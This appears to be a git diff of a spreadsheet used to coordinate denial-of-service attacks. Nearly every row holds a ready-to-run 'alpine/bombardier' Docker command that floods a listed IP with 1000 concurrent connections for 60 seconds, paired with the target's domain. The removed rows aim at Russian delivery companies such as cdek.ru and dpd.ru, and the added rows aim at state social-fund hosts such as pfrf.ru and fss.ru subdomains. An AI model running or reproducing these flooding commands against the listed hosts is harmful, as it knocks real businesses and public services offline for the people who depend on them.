-      <t>boxberry.ru</t>
-    </r>
+    <t>boxberry.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.247&amp;&amp; sleep 5;</t>
@@ -177,15 +145,7 @@
     <t>185.65.22.18</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="12"/>
-        <color indexed="11"/>
-        <rFont val="Calibri"/>
-      </rPr>
-      <t>cse.ru</t>
-    </r>
+    <t>cse.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.21.153&amp;&amp; sleep 5;</t>
@@ -272,15 +232,7 @@
     <t>78.46.28.63</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="12"/>
-        <color indexed="11"/>
-        <rFont val="Calibri"/>
-      </rPr>
-      <t>cdek.ru</t>
-    </r>
+    <t>cdek.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.60&amp;&amp; sleep 5;</t>
@@ -488,7 +440,7 @@
   <numFmts count="1">
     <numFmt numFmtId="0" formatCode="General"/>
   </numFmts>
-  <fonts count="4">
+  <fonts count="3">
     <font>
       <sz val="12"/>
       <color indexed="8"/>
@@ -502,12 +454,6 @@
     <font>
       <sz val="15"/>
       <color indexed="8"/>
-      <name val="Calibri"/>
-    </font>
-    <font>
-      <u val="single"/>
-      <sz val="12"/>
-      <color indexed="11"/>
       <name val="Calibri"/>
     </font>
   </fonts>
@@ -700,7 +646,6 @@
       <rgbColor rgb="ff000000"/>
       <rgbColor rgb="ffffffff"/>
       <rgbColor rgb="ffaaaaaa"/>
-      <rgbColor rgb="ff0000ff"/>
     </indexedColors>
   </colors>
 </styleSheet>
@@ -6711,77 +6656,6 @@
       <c r="E636" s="3"/>
     </row>
   </sheetData>
-  <hyperlinks>
-    <hyperlink ref="C1" r:id="rId1" location="" tooltip="" display="ponyexpress.ru"/>
-    <hyperlink ref="C2" r:id="rId2" location="" tooltip="" display="ponyexpress.ru"/>
-    <hyperlink ref="C3" r:id="rId3" location="" tooltip="" display="ponyexpress.ru"/>
-    <hyperlink ref="C4" r:id="rId4" location="" tooltip="" display="express.dhl.ru"/>
-    <hyperlink ref="C5" r:id="rId5" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C6" r:id="rId6" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C7" r:id="rId7" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C8" r:id="rId8" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C9" r:id="rId9" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C10" r:id="rId10" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C11" r:id="rId11" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C12" r:id="rId12" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C13" r:id="rId13" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C14" r:id="rId14" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C15" r:id="rId15" location="" tooltip="" display="boxberry.ru"/>
-    <hyperlink ref="C16" r:id="rId16" location="" tooltip="" display="boxberry.ru"/>
-    <hyperlink ref="C17" r:id="rId17" location="" tooltip="" display="boxberry.ru"/>
-    <hyperlink ref="C18" r:id="rId18" location="" tooltip="" display="boxberry.ru"/>
-    <hyperlink ref="C19" r:id="rId19" location="" tooltip="" display="boxberry.ru"/>
-    <hyperlink ref="C20" r:id="rId20" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C21" r:id="rId21" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C22" r:id="rId22" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C23" r:id="rId23" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C24" r:id="rId24" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C25" r:id="rId25" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C26" r:id="rId26" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C27" r:id="rId27" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C28" r:id="rId28" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C29" r:id="rId29" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C30" r:id="rId30" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C31" r:id="rId31" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C32" r:id="rId32" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C33" r:id="rId33" location="" tooltip="" display="cse.ru"/>
-    <hyperlink ref="C34" r:id="rId34" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C35" r:id="rId35" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C36" r:id="rId36" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C37" r:id="rId37" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C38" r:id="rId38" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C39" r:id="rId39" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C40" r:id="rId40" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C41" r:id="rId41" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C42" r:id="rId42" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C43" r:id="rId43" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C44" r:id="rId44" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C45" r:id="rId45" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C46" r:id="rId46" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C47" r:id="rId47" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C48" r:id="rId48" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C49" r:id="rId49" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C50" r:id="rId50" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C51" r:id="rId51" location="" tooltip="" display="cdek.ru"/>
-    <hyperlink ref="C52" r:id="rId52" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C53" r:id="rId53" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C54" r:id="rId54" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C55" r:id="rId55" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C56" r:id="rId56" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C57" r:id="rId57" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C58" r:id="rId58" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C59" r:id="rId59" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C60" r:id="rId60" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C61" r:id="rId61" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C62" r:id="rId62" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C63" r:id="rId63" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C64" r:id="rId64" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C65" r:id="rId65" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C66" r:id="rId66" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C67" r:id="rId67" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C68" r:id="rId68" location="" tooltip="" display="dpd.ru"/>
-    <hyperlink ref="C69" r:id="rId69" location="" tooltip="" display="dpd.ru"/>
-  </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup firstPageNumber="1" fitToHeight="1" fitToWidth="1" scale="100" useFirstPageNumber="0" orientation="portrait" pageOrder="downThenOver"/>
   <headerFooter>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,426 +11,114 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="140">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="36">
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.216.121&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.161.52.80 &amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>91.206.216.121</t>
+    <t xml:space="preserve">195.161.52.80 </t>
   </si>
   <si>
-    <t>ponyexpress.ru</t>
+    <t>pfrf.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.32.57.158&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.189&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>185.32.57.158</t>
+    <t>193.148.44.189</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.217.30&amp;&amp; sleep 5;</t>
+    <t>fss.ru</t>
   </si>
   <si>
-    <t>91.206.217.30</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.186&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.73.60.2&amp;&amp; sleep 5;</t>
+    <t>193.148.44.186</t>
   </si>
   <si>
-    <t>217.73.60.2</t>
+    <t xml:space="preserve">data.fss.ru </t>
   </si>
   <si>
-    <t>express.dhl.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.187&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.6&amp;&amp; sleep 5;</t>
+    <t>193.148.44.187</t>
   </si>
   <si>
-    <t>91.209.80.6</t>
+    <t xml:space="preserve">docs.fss.ru </t>
   </si>
   <si>
-    <t>dpd.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.192&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.43.147.90&amp;&amp; sleep 5;</t>
+    <t>193.148.44.192</t>
   </si>
   <si>
-    <t>77.43.147.90</t>
+    <t>sip.fss.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.9&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.195&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>91.209.80.9</t>
+    <t>193.148.44.195</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.233&amp;&amp; sleep 5;</t>
+    <t>support.fss.ru</t>
   </si>
   <si>
-    <t>91.209.80.233</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.196&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.143.8.107&amp;&amp; sleep 5;</t>
+    <t>193.148.44.196</t>
   </si>
   <si>
-    <t>37.143.8.107</t>
+    <t>map.fss.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 88.99.94.22&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.202&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>88.99.94.22</t>
+    <t>193.148.44.202</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.24&amp;&amp; sleep 5;</t>
+    <t>ftp.fss.ru</t>
   </si>
   <si>
-    <t>91.209.80.24</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.208&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.72&amp;&amp; sleep 5;</t>
+    <t>193.148.44.208</t>
   </si>
   <si>
-    <t>91.209.80.72</t>
+    <t xml:space="preserve">av.fss.ru </t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.73&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.217&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>91.209.80.73</t>
+    <t>193.148.44.217</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.7&amp;&amp; sleep 5;</t>
+    <t xml:space="preserve">fw.fss.ru </t>
   </si>
   <si>
-    <t>91.209.80.7</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.218&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.246&amp;&amp; sleep 5;</t>
+    <t>193.148.44.218</t>
   </si>
   <si>
-    <t>159.69.63.246</t>
+    <t>proxy.fss.ru</t>
   </si>
   <si>
-    <t>boxberry.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.148.44.29 &amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.247&amp;&amp; sleep 5;</t>
+    <t xml:space="preserve">193.148.44.29 </t>
   </si>
   <si>
-    <t>159.69.63.247</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.248&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>159.69.63.248</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.130.235.116&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.130.235.116</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.111.60.15&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>89.111.60.15</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.18</t>
-  </si>
-  <si>
-    <t>cse.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.21.153&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.21.153</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.8&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.8</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.21.53&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.21.53</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.20.23&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.20.23</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.125&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.232.125</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.188&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.232.188</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.17&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.17</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.9&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.9</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.35&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.35</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.5&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.5</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.25&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.25</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.70&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.22.70</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.20.5&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.65.20.5</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.28.63&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>78.46.28.63</t>
-  </si>
-  <si>
-    <t>cdek.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.60&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.60</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.41&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.41</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.59&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.59</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.57&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.57</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.19&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.19</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.10&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.215.4.10</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.56&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.56</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.20&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.215.4.20</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.40&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.165.123.40</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.206&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.165.123.206</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.200&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.165.123.200</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.61&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.49.120.61</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.62&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.49.120.62</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.55&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.189.222.55</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.60&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.49.120.60</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.49.120.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.121.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.49.121.18</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.225&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.225</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 1.15.8.2&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>1.15.8.2</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.169.155.177&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.169.155.177</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.61&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.61</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.254&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.254</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.224&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.224</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.219&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.219</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.237&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.237</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.240&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.240</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.64&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.64</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.223&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.223</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.249&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.249</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.220&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.220</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.71&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.71</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.62&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.62</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.17&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.209.80.17</t>
+    <t>beta.fss.ru</t>
   </si>
 </sst>
 </file>
@@ -1743,7 +1431,7 @@
         <v>4</v>
       </c>
       <c r="C2" t="s" s="2">
-        <v>2</v>
+        <v>5</v>
       </c>
       <c r="D2" s="3"/>
       <c r="E2" s="3"/>
@@ -1751,13 +1439,13 @@
     <row r="3" ht="15.35" customHeight="1">
       <c r="A3" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B3&amp;"&amp;&amp; sleep 5;"</f>
-        <v>5</v>
+        <v>6</v>
       </c>
       <c r="B3" t="s" s="2">
-        <v>6</v>
+        <v>7</v>
       </c>
       <c r="C3" t="s" s="2">
-        <v>2</v>
+        <v>8</v>
       </c>
       <c r="D3" s="3"/>
       <c r="E3" s="3"/>
@@ -1765,13 +1453,13 @@
     <row r="4" ht="15.35" customHeight="1">
       <c r="A4" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B4&amp;"&amp;&amp; sleep 5;"</f>
-        <v>7</v>
+        <v>9</v>
       </c>
       <c r="B4" t="s" s="2">
-        <v>8</v>
+        <v>10</v>
       </c>
       <c r="C4" t="s" s="2">
-        <v>9</v>
+        <v>11</v>
       </c>
       <c r="D4" s="3"/>
       <c r="E4" s="3"/>
@@ -1779,13 +1467,13 @@
     <row r="5" ht="15.35" customHeight="1">
       <c r="A5" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B5&amp;"&amp;&amp; sleep 5;"</f>
-        <v>10</v>
+        <v>12</v>
       </c>
       <c r="B5" t="s" s="2">
-        <v>11</v>
+        <v>13</v>
       </c>
       <c r="C5" t="s" s="2">
-        <v>12</v>
+        <v>14</v>
       </c>
       <c r="D5" s="3"/>
       <c r="E5" s="3"/>
@@ -1793,13 +1481,13 @@
     <row r="6" ht="15.35" customHeight="1">
       <c r="A6" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B6&amp;"&amp;&amp; sleep 5;"</f>
-        <v>13</v>
+        <v>15</v>
       </c>
       <c r="B6" t="s" s="2">
-        <v>14</v>
+        <v>16</v>
       </c>
       <c r="C6" t="s" s="2">
-        <v>12</v>
+        <v>17</v>
       </c>
       <c r="D6" s="3"/>
       <c r="E6" s="3"/>
@@ -1807,13 +1495,13 @@
     <row r="7" ht="15.35" customHeight="1">
       <c r="A7" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B7&amp;"&amp;&amp; sleep 5;"</f>
-        <v>15</v>
+        <v>18</v>
       </c>
       <c r="B7" t="s" s="2">
-        <v>16</v>
+        <v>19</v>
       </c>
       <c r="C7" t="s" s="2">
-        <v>12</v>
+        <v>20</v>
       </c>
       <c r="D7" s="3"/>
       <c r="E7" s="3"/>
@@ -1821,13 +1509,13 @@
     <row r="8" ht="15.35" customHeight="1">
       <c r="A8" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B8&amp;"&amp;&amp; sleep 5;"</f>
-        <v>17</v>
+        <v>21</v>
       </c>
       <c r="B8" t="s" s="2">
-        <v>18</v>
+        <v>22</v>
       </c>
       <c r="C8" t="s" s="2">
-        <v>12</v>
+        <v>23</v>
       </c>
       <c r="D8" s="3"/>
       <c r="E8" s="3"/>
@@ -1835,13 +1523,13 @@
     <row r="9" ht="15.35" customHeight="1">
       <c r="A9" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B9&amp;"&amp;&amp; sleep 5;"</f>
-        <v>19</v>
+        <v>24</v>
       </c>
       <c r="B9" t="s" s="2">
-        <v>20</v>
+        <v>25</v>
       </c>
       <c r="C9" t="s" s="2">
-        <v>12</v>
+        <v>26</v>
       </c>
       <c r="D9" s="3"/>
       <c r="E9" s="3"/>
@@ -1849,13 +1537,13 @@
     <row r="10" ht="15.35" customHeight="1">
       <c r="A10" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B10&amp;"&amp;&amp; sleep 5;"</f>
-        <v>21</v>
+        <v>27</v>
       </c>
       <c r="B10" t="s" s="2">
-        <v>22</v>
+        <v>28</v>
       </c>
       <c r="C10" t="s" s="2">
-        <v>12</v>
+        <v>29</v>
       </c>
       <c r="D10" s="3"/>
       <c r="E10" s="3"/>
@@ -1863,13 +1551,13 @@
     <row r="11" ht="15.35" customHeight="1">
       <c r="A11" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B11&amp;"&amp;&amp; sleep 5;"</f>
-        <v>23</v>
+        <v>30</v>
       </c>
       <c r="B11" t="s" s="2">
-        <v>24</v>
+        <v>31</v>
       </c>
       <c r="C11" t="s" s="2">
-        <v>12</v>
+        <v>32</v>
       </c>
       <c r="D11" s="3"/>
       <c r="E11" s="3"/>
@@ -1877,812 +1565,413 @@
     <row r="12" ht="15.35" customHeight="1">
       <c r="A12" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B12&amp;"&amp;&amp; sleep 5;"</f>
-        <v>25</v>
+        <v>33</v>
       </c>
       <c r="B12" t="s" s="2">
-        <v>26</v>
+        <v>34</v>
       </c>
       <c r="C12" t="s" s="2">
-        <v>12</v>
+        <v>35</v>
       </c>
       <c r="D12" s="3"/>
       <c r="E12" s="3"/>
     </row>
     <row r="13" ht="15.35" customHeight="1">
-      <c r="A13" t="s" s="2">
